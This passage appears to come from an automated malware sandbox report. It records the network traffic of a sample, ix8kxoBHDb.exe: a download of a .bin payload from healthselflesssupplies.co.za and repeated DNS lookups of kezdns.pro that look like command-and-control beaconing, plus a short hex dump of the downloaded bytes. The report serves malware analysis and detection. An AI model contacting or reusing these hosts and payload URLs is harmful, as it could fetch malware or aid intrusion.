Jan 11, 2025 08:11:50.249780893 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.249825001 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.249937057 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.249954939 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.250076056 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.250094891 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.250173092 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.250416994 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.250433922 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.250489950 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.250497103 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.250535011 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.250657082 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.250673056 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.250813961 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.250823975 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.251102924 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.251142979 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.251162052 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.251224995 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.251224995 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.251244068 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.251343012 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.389637947 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.389664888 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.389777899 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.389803886 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.389847994 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.389925003 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.390063047 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.390078068 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.390121937 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.390130043 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.390186071 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.390645981 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.390670061 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.390697956 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.390714884 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.390748024 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.390774012 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.390831947 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.390902042 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.390903950 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.390970945 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.391024113 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.391035080 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.391046047 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.391079903 CET	49867	443	192.168.2.11	164.160.91.32

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:11:47.296338081 CET	59608	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:11:47.727479935 CET	53	59608	1.1.1.1	192.168.2.11
Jan 11, 2025 08:11:52.749174118 CET	51560	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:11:52.757822037 CET	53	51560	1.1.1.1	192.168.2.11
Jan 11, 2025 08:11:57.846646070 CET	52401	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:11:57.855345964 CET	53	52401	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:02.923938990 CET	62284	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:02.939137936 CET	53	62284	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:08.103056908 CET	54733	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:08.112057924 CET	53	54733	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:13.224217892 CET	64233	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:13.232880116 CET	53	64233	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:18.298834085 CET	62326	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:18.314027071 CET	53	62326	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:23.392553091 CET	52474	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:23.401057959 CET	53	52474	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:28.276556015 CET	61485	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:28.286782026 CET	53	61485	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:32.423985004 CET	58027	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:32.438194990 CET	53	58027	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:37.950933933 CET	64445	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:37.959409952 CET	53	64445	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:42.642726898 CET	62439	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:42.761764050 CET	53	62439	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:47.597134113 CET	64290	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:47.612893105 CET	53	64290	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:52.517741919 CET	55030	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:52.532412052 CET	53	55030	1.1.1.1	192.168.2.11
Jan 11, 2025 08:12:57.408377886 CET	56709	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:12:57.416127920 CET	53	56709	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:02.440567017 CET	63043	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:02.447915077 CET	53	63043	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:07.620408058 CET	54422	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:07.628957033 CET	53	54422	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:12.408036947 CET	51659	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:12.415141106 CET	53	51659	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:17.408344030 CET	56672	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:17.416748047 CET	53	56672	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:22.408279896 CET	65311	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:22.422918081 CET	53	65311	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:27.408499956 CET	56624	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:27.426017046 CET	53	56624	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:32.640294075 CET	56246	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:32.655653000 CET	53	56246	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:37.408659935 CET	63833	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:37.424369097 CET	53	63833	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:42.407958984 CET	61783	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:42.418760061 CET	53	61783	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:47.411034107 CET	59853	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:47.528084993 CET	53	59853	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:52.408683062 CET	54929	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:52.425332069 CET	53	54929	1.1.1.1	192.168.2.11
Jan 11, 2025 08:13:57.408204079 CET	64845	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:13:57.417026043 CET	53	64845	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:02.408425093 CET	58137	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:02.423821926 CET	53	58137	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:07.408188105 CET	50064	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:07.418863058 CET	53	50064	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:12.408461094 CET	56132	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:12.417370081 CET	53	56132	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:17.458120108 CET	58014	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:17.465418100 CET	53	58014	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:22.408385992 CET	62438	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:22.423768044 CET	53	62438	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:27.408042908 CET	56548	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:27.415432930 CET	53	56548	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:32.408355951 CET	51299	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:32.416743994 CET	53	51299	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:37.408133984 CET	56715	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:37.416119099 CET	53	56715	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:42.409060955 CET	61360	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:42.415999889 CET	53	61360	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:47.408030033 CET	56181	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:47.415050983 CET	53	56181	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:52.408279896 CET	63587	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:52.415859938 CET	53	63587	1.1.1.1	192.168.2.11
Jan 11, 2025 08:14:57.408123016 CET	61455	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:14:57.415507078 CET	53	61455	1.1.1.1	192.168.2.11
Jan 11, 2025 08:15:02.408325911 CET	62441	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:15:02.415847063 CET	53	62441	1.1.1.1	192.168.2.11
Jan 11, 2025 08:15:07.408106089 CET	62818	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:15:07.415273905 CET	53	62818	1.1.1.1	192.168.2.11
Jan 11, 2025 08:15:12.409050941 CET	60810	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:15:12.418734074 CET	53	60810	1.1.1.1	192.168.2.11
Jan 11, 2025 08:15:17.409604073 CET	62592	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:15:17.417228937 CET	53	62592	1.1.1.1	192.168.2.11
Jan 11, 2025 08:15:22.408072948 CET	58777	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:15:22.416134119 CET	53	58777	1.1.1.1	192.168.2.11
Jan 11, 2025 08:15:28.116154909 CET	50755	53	192.168.2.11	1.1.1.1
Jan 11, 2025 08:15:28.124474049 CET	53	50755	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 08:11:47.296338081 CET	192.168.2.11	1.1.1.1	0xefc0	Standard query (0)	www.healthselflesssupplies.co.za	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:52.749174118 CET	192.168.2.11	1.1.1.1	0xa05	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:57.846646070 CET	192.168.2.11	1.1.1.1	0x9b95	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:02.923938990 CET	192.168.2.11	1.1.1.1	0x8e1d	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:08.103056908 CET	192.168.2.11	1.1.1.1	0xa6fc	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:13.224217892 CET	192.168.2.11	1.1.1.1	0xad84	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:18.298834085 CET	192.168.2.11	1.1.1.1	0xe039	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:23.392553091 CET	192.168.2.11	1.1.1.1	0xbb04	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:28.276556015 CET	192.168.2.11	1.1.1.1	0x2b7c	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:32.423985004 CET	192.168.2.11	1.1.1.1	0x9801	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:37.950933933 CET	192.168.2.11	1.1.1.1	0x3fca	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:42.642726898 CET	192.168.2.11	1.1.1.1	0xe826	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:47.597134113 CET	192.168.2.11	1.1.1.1	0x31a2	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:52.517741919 CET	192.168.2.11	1.1.1.1	0x66b8	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:57.408377886 CET	192.168.2.11	1.1.1.1	0x9b85	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:02.440567017 CET	192.168.2.11	1.1.1.1	0xdf43	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:07.620408058 CET	192.168.2.11	1.1.1.1	0x6ef9	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:12.408036947 CET	192.168.2.11	1.1.1.1	0x2713	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:17.408344030 CET	192.168.2.11	1.1.1.1	0x2a3e	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:22.408279896 CET	192.168.2.11	1.1.1.1	0x469	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:27.408499956 CET	192.168.2.11	1.1.1.1	0xbbde	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:32.640294075 CET	192.168.2.11	1.1.1.1	0x83d8	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:37.408659935 CET	192.168.2.11	1.1.1.1	0x45e5	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:42.407958984 CET	192.168.2.11	1.1.1.1	0x146d	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:47.411034107 CET	192.168.2.11	1.1.1.1	0xf950	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:52.408683062 CET	192.168.2.11	1.1.1.1	0x9cfb	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:57.408204079 CET	192.168.2.11	1.1.1.1	0x7d95	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:02.408425093 CET	192.168.2.11	1.1.1.1	0x28dd	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:07.408188105 CET	192.168.2.11	1.1.1.1	0x441	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:12.408461094 CET	192.168.2.11	1.1.1.1	0xb559	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:17.458120108 CET	192.168.2.11	1.1.1.1	0xdce6	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:22.408385992 CET	192.168.2.11	1.1.1.1	0x9f76	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:27.408042908 CET	192.168.2.11	1.1.1.1	0x32fd	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:32.408355951 CET	192.168.2.11	1.1.1.1	0xa9c7	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:37.408133984 CET	192.168.2.11	1.1.1.1	0xd282	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:42.409060955 CET	192.168.2.11	1.1.1.1	0xe731	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:47.408030033 CET	192.168.2.11	1.1.1.1	0xdf4a	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:52.408279896 CET	192.168.2.11	1.1.1.1	0x8739	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:57.408123016 CET	192.168.2.11	1.1.1.1	0xf0b0	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:02.408325911 CET	192.168.2.11	1.1.1.1	0xe6e2	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:07.408106089 CET	192.168.2.11	1.1.1.1	0x1b58	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:12.409050941 CET	192.168.2.11	1.1.1.1	0x1e92	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:17.409604073 CET	192.168.2.11	1.1.1.1	0xd5d1	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:22.408072948 CET	192.168.2.11	1.1.1.1	0xf06a	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:28.116154909 CET	192.168.2.11	1.1.1.1	0x4fc5	Standard query (0)	kezdns.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 08:11:47.727479935 CET	1.1.1.1	192.168.2.11	0xefc0	No error (0)	www.healthselflesssupplies.co.za	healthselflesssupplies.co.za		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 08:11:47.727479935 CET	1.1.1.1	192.168.2.11	0xefc0	No error (0)	healthselflesssupplies.co.za		164.160.91.32	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:52.757822037 CET	1.1.1.1	192.168.2.11	0xa05	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:57.855345964 CET	1.1.1.1	192.168.2.11	0x9b95	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:02.939137936 CET	1.1.1.1	192.168.2.11	0x8e1d	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:08.112057924 CET	1.1.1.1	192.168.2.11	0xa6fc	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:13.232880116 CET	1.1.1.1	192.168.2.11	0xad84	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:18.314027071 CET	1.1.1.1	192.168.2.11	0xe039	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:23.401057959 CET	1.1.1.1	192.168.2.11	0xbb04	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:28.286782026 CET	1.1.1.1	192.168.2.11	0x2b7c	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:32.438194990 CET	1.1.1.1	192.168.2.11	0x9801	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:37.959409952 CET	1.1.1.1	192.168.2.11	0x3fca	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:42.761764050 CET	1.1.1.1	192.168.2.11	0xe826	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:47.612893105 CET	1.1.1.1	192.168.2.11	0x31a2	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:52.532412052 CET	1.1.1.1	192.168.2.11	0x66b8	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:12:57.416127920 CET	1.1.1.1	192.168.2.11	0x9b85	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:02.447915077 CET	1.1.1.1	192.168.2.11	0xdf43	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:07.628957033 CET	1.1.1.1	192.168.2.11	0x6ef9	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:12.415141106 CET	1.1.1.1	192.168.2.11	0x2713	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:17.416748047 CET	1.1.1.1	192.168.2.11	0x2a3e	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:22.422918081 CET	1.1.1.1	192.168.2.11	0x469	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:27.426017046 CET	1.1.1.1	192.168.2.11	0xbbde	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:32.655653000 CET	1.1.1.1	192.168.2.11	0x83d8	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:37.424369097 CET	1.1.1.1	192.168.2.11	0x45e5	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:42.418760061 CET	1.1.1.1	192.168.2.11	0x146d	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:47.528084993 CET	1.1.1.1	192.168.2.11	0xf950	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:52.425332069 CET	1.1.1.1	192.168.2.11	0x9cfb	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:13:57.417026043 CET	1.1.1.1	192.168.2.11	0x7d95	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:02.423821926 CET	1.1.1.1	192.168.2.11	0x28dd	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:07.418863058 CET	1.1.1.1	192.168.2.11	0x441	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:12.417370081 CET	1.1.1.1	192.168.2.11	0xb559	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:17.465418100 CET	1.1.1.1	192.168.2.11	0xdce6	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:22.423768044 CET	1.1.1.1	192.168.2.11	0x9f76	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:27.415432930 CET	1.1.1.1	192.168.2.11	0x32fd	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:32.416743994 CET	1.1.1.1	192.168.2.11	0xa9c7	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:37.416119099 CET	1.1.1.1	192.168.2.11	0xd282	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:42.415999889 CET	1.1.1.1	192.168.2.11	0xe731	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:47.415050983 CET	1.1.1.1	192.168.2.11	0xdf4a	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:52.415859938 CET	1.1.1.1	192.168.2.11	0x8739	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:14:57.415507078 CET	1.1.1.1	192.168.2.11	0xf0b0	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:02.415847063 CET	1.1.1.1	192.168.2.11	0xe6e2	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:07.415273905 CET	1.1.1.1	192.168.2.11	0x1b58	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:12.418734074 CET	1.1.1.1	192.168.2.11	0x1e92	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:17.417228937 CET	1.1.1.1	192.168.2.11	0xd5d1	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:22.416134119 CET	1.1.1.1	192.168.2.11	0xf06a	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:15:28.124474049 CET	1.1.1.1	192.168.2.11	0x4fc5	Name error (3)	kezdns.pro	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.healthselflesssupplies.co.za

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49867	164.160.91.32	443	7876	C:\Users\user\Desktop\ix8kxoBHDb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:11:48 UTC	193	OUT	GET /cdOCcPHZK213.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: www.healthselflesssupplies.co.za Cache-Control: no-cache
2025-01-11 07:11:49 UTC	404	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Wed, 04 Dec 2024 06:17:51 GMT accept-ranges: bytes content-length: 493120 date: Sat, 11 Jan 2025 07:11:49 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-01-11 07:11:49 UTC	964	IN	Data Raw: 38 cf cb cf 33 cc 2a f1 ee 1a 86 6c 1b ee 11 f5 dc 7f 1e 40 25 c3 f3 75 52 43 f2 6c 9e de 8d 17 78 2b 25 8d fa 8c ac 2c 8b 20 bb c6 53 25 2d 58 d1 b1 2e 01 35 18 5e f3 10 60 1d f1 c6 33 61 65 a1 09 2b 25 14 17 fe 05 5d c8 08 94 f8 bb 25 71 a3 a7 d0 44 7c df 02 bc 8c e3 bf c7 ac a3 3a 4b 08 ec 04 9d aa fa 0e 2c 12 6f ce f5 8b a3 66 6e 12 fa 0e 50 df 9b 00 6c 45 4b 89 81 ed b1 d1 f9 f8 21 e0 95 32 94 e9 20 d7 de 37 f0 44 92 d7 54 f7 91 80 2b 89 55 e2 39 c8 5b 9d 34 10 e9 1b 90 3a 4e 33 db d5 9f 30 e9 c0 9a 63 b7 33 da 6c 87 12 4b 0c cc cc 6e 0b 52 0b af a2 9b a5 38 ba ed 33 6e 48 90 22 40 aa b9 31 77 31 cf 77 75 fd b4 d9 ff 2c 75 55 ba 6d 7e d0 5d c6 34 6a a4 85 0c 58 9a 2e 01 95 55 91 35 5f 3a 11 6f 3a bb d9 de fc 5e c9 95 4a ab eb 53 81 23 44 da eb 28 48 Data Ascii: 83*l@%uRClx+%, S%-X.5^`3ae+%]%qD\|:K,ofnPlEK!2 7DT+U9[4:N30c3lKnR83nH"@1w1wu,uUm~]4jX.U5_:o:^JS#D(H
